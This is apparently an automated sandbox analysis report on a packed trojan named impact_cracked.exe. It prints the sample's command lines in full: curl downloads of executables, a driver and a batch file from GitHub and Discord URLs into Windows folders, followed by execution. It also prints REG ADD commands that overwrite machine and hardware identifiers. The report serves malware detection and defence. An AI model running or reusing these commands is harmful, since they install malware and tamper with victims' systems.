Malware Analysis Report

2025-08-05 21:24

Sample ID 231222-ajhb9aeeal
Target impact_cracked.exe
SHA256 20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c
Tags
vmprotect evasion themida trojan
score
9/10

Analysis Overview

Threat Level: Likely malicious

The file impact_cracked.exe was found to be: Likely malicious.

Malicious Activity Summary

vmprotect evasion themida trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Checks BIOS information in registry

VMProtect packed file

Themida packer

Executes dropped EXE

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies registry key

Analysis: static1

Detonation Overview

Reported

2023-12-22 00:14

Signatures

VMProtect packed file

vmprotect

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2023-12-22 00:14

Reported

2023-12-22 00:16

Platform

win10v2004-20231215-en

Max time kernel

74s

Max time network

80s

Command Line

"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\IME\AppleCleaner.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\IME\AppleCleaner.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\IME\AppleCleaner.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\IME\AppleCleaner.exe N/A

Themida packer

themida

VMProtect packed file

vmprotect

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\IME\AppleCleaner.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\IME\AppleCleaner.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\GameBarPresenceWriter\Solution.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Solution64.sys C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Disk1.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Disk2.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\GameBarPresenceWriter\Mac.bat C:\Windows\system32\curl.exe N/A
File created C:\Windows\IME\AppleCleaner.exe C:\Windows\system32\curl.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4948 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 928 wrote to memory of 3264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 928 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4948 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\IME\AppleCleaner.exe
PID 4948 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4948 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1944 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4500 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 920 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1444 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4948 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 2992 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 812 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 4384 wrote to memory of 1332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 4060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4948 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe C:\Windows\system32\cmd.exe
PID 3640 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe

"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe >nul 2>&1

C:\Windows\system32\curl.exe

curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Windows\IME\AppleCleaner.exe

C:\Windows\IME\AppleCleaner.exe

C:\Windows\IME\AppleCleaner.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\IME\AppleCleaner.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul

C:\Windows\system32\curl.exe

curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 6131 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {613121375-3155415346-1546629722} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 613432124-166506641-25780881 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {613432124-166506641-25780881} /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 613432124-166506641-25780881 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 613710104-174630705-33274807 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul

C:\Windows\system32\reg.exe

REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
